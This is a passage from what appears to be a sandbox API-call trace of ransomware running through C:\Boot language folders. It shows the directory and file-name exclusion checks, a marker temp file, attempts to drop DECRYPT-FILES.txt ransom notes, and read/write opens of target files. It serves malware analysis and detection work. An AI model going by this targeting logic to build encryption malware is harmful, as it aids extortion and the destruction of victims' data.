[0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.619] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.619] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.619] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.619] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.619] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.619] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.619] lstrlenW (lpString="C:\\Boot\\ja-JP\\") returned 14 [0179.619] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.619] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\ja-JP\\" | out: lpString1="C:\\Boot\\ja-JP\\") returned="C:\\Boot\\ja-JP\\" [0179.619] lstrcatW (in: lpString1="C:\\Boot\\ja-JP\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned="C:\\Boot\\ja-JP\\bootmgr.exe.mui" [0179.619] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.619] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.619] CloseHandle (hObject=0x0) returned 0 [0179.619] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.620] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.620] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.620] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b37780, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b37780, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b37780, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.620] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.620] CloseHandle (hObject=0xffffffff) returned 0 [0179.620] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0179.620] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0179.620] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0179.620] lstrcatW (in: lpString1="ko-KR", lpString2="\\" | out: lpString1="ko-KR\\") returned="ko-KR\\" [0179.620] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ko-KR\\" | out: lpString1="C:\\Boot\\ko-KR\\") returned="C:\\Boot\\ko-KR\\" [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Program Files") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch=":\\Windows") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Games\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\All Users") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="AhnLab") returned 0x0 [0179.620] StrStrW (lpFirst="C:\\Boot\\ko-KR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.620] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0179.620] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.620] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\ko-KR\\\\0a16c9.tmp") returned 25 [0179.620] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\\\0a16c9.tmp" (normalized: "c:\\boot\\ko-kr\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.621] GetLastError () returned 0x5 [0179.621] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0179.621] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.621] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\ko-KR\\\\DECRYPT-FILES.txt") returned 32 [0179.621] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\ko-kr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.629] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0179.629] lstrcatW (in: lpString1="C:\\Boot\\ko-KR\\", lpString2="*" | out: lpString1="C:\\Boot\\ko-KR\\*") returned="C:\\Boot\\ko-KR\\*" [0179.629] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.630] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.630] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.630] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.630] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.630] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.630] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.630] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.630] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.630] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.630] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.630] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.630] lstrlenW (lpString="C:\\Boot\\ko-KR\\") returned 14 [0179.630] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.630] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\ko-KR\\" | out: lpString1="C:\\Boot\\ko-KR\\") returned="C:\\Boot\\ko-KR\\" [0179.630] lstrcatW (in: lpString1="C:\\Boot\\ko-KR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned="C:\\Boot\\ko-KR\\bootmgr.exe.mui" [0179.630] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.631] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.631] CloseHandle (hObject=0x0) returned 0 [0179.631] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.631] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.631] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.631] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.631] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.631] CloseHandle (hObject=0xffffffff) returned 0 [0179.631] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="DECRYPT-FILES.txt") returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="autorun.inf") returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="boot.ini") returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="desktop.ini") returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="ntuser.dat") returned -1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="iconcache.db") returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="bootsect.bak") returned 1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="ntuser.dat.log") returned -1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="thumbs.db") returned -1 [0179.631] lstrcmpiW (lpString1="memtest.exe", lpString2="Bootfont.bin") returned 1 [0179.631] lstrlenW (lpString="memtest.exe") returned 11 [0179.631] lstrcmpiW (lpString1="exe", lpString2="lnk") returned -1 [0179.631] lstrcmpiW (lpString1="exe", lpString2="exe") returned 0 [0179.631] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0179.631] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0179.632] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0179.632] lstrcatW (in: lpString1="nb-NO", lpString2="\\" | out: lpString1="nb-NO\\") returned="nb-NO\\" [0179.632] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="nb-NO\\" | out: lpString1="C:\\Boot\\nb-NO\\") returned="C:\\Boot\\nb-NO\\" [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Program Files") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch=":\\Windows") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Games\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\All Users") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="AhnLab") returned 0x0 [0179.632] StrStrW (lpFirst="C:\\Boot\\nb-NO\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.632] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0179.632] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.632] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\nb-NO\\\\0a16c9.tmp") returned 25 [0179.632] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\\\0a16c9.tmp" (normalized: "c:\\boot\\nb-no\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.632] GetLastError () returned 0x5 [0179.632] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0179.632] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.632] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\nb-NO\\\\DECRYPT-FILES.txt") returned 32 [0179.632] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\nb-no\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.633] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0179.633] lstrcatW (in: lpString1="C:\\Boot\\nb-NO\\", lpString2="*" | out: lpString1="C:\\Boot\\nb-NO\\*") returned="C:\\Boot\\nb-NO\\*" [0179.633] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0179.634] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.634] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b5d8e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.634] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.634] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0179.634] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0179.634] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.634] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0179.634] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0179.634] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0179.634] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0179.634] lstrlenW (lpString="C:\\Boot\\nb-NO\\") returned 14 [0179.634] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0179.634] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\Boot\\nb-NO\\" | out: lpString1="C:\\Boot\\nb-NO\\") returned="C:\\Boot\\nb-NO\\" [0179.634] lstrcatW (in: lpString1="C:\\Boot\\nb-NO\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned="C:\\Boot\\nb-NO\\bootmgr.exe.mui" [0179.634] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.634] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.636] CloseHandle (hObject=0x0) returned 0 [0179.636] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.636] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b83a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.636] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.636] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6b5d8e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6b5d8e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6b83a40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0179.636] FindClose (in: hFindFile=0x479838 | out: hFindFile=0x479838) returned 1 [0179.636] CloseHandle (hObject=0xffffffff) returned 0 [0179.636] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ba9ba0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ba9ba0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0179.636] lstrcmpW (lpString1="nl-NL", lpString2=".") returned 1 [0179.636] lstrcmpW (lpString1="nl-NL", lpString2="..") returned 1 [0179.636] lstrcatW (in: lpString1="nl-NL", lpString2="\\" | out: lpString1="nl-NL\\") returned="nl-NL\\" [0179.636] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="nl-NL\\" | out: lpString1="C:\\Boot\\nl-NL\\") returned="C:\\Boot\\nl-NL\\" [0179.636] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Program Files") returned 0x0 [0179.636] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch=":\\Windows") returned 0x0 [0179.636] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Games\\") returned 0x0 [0179.636] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.636] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.636] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\All Users") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="AhnLab") returned 0x0 [0179.637] StrStrW (lpFirst="C:\\Boot\\nl-NL\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.637] lstrlenW (lpString="C:\\Boot\\nl-NL\\") returned 14 [0179.637] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.637] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\Boot\\nl-NL\\\\0a16c9.tmp") returned 25 [0179.637] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\\\0a16c9.tmp" (normalized: "c:\\boot\\nl-nl\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) 